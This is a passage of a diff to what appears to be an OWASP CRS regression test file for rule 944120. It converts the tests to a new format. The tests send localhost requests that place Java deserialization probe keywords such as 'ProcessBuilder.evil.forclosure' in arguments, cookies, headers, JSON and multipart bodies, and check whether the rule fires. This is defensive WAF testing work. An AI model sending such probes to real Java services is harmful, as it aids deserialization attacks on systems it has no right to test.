"en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-17 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 17 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.clonetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-18 + ProcessBuilder.evil.clonetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 18 desc: "Argument test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 19 desc: "Argument name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure=test" + output: + log: + expect_ids: [944120] + - test_id: 20 desc: "Cookie test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 21 desc: "Cookie name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 22 desc: "Request header test includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 23 desc: "XML element includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 24 desc: "XML attribute name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 25 desc: "XML attribute value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 26 desc: "XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 27 desc: "Nested XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 28 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.forclosure" - output: - log_contains: "id \"944120\"" - - test_title: 944120-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.forclosure" + output: + log: + expect_ids: [944120] + - test_id: 29 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.forclosure\"}" + output: + log: + expect_ids: [944120] + - test_id: 30 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.forclosure\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 31 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-32 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 32 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.forclosure": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-33 + {"ProcessBuilder.evil.forclosure": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 33 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-34 + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 34 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.forclosure - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-35 + ProcessBuilder.evil.forclosure + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 35 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-36 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 36 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-37 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory=test" + output: + log: + expect_ids: [944120] + - test_id: 37 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-38 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 38 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatefactory=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-39 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 39 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-40 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 40 desc: "XML element includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-41 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 41 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-42 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 42 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - 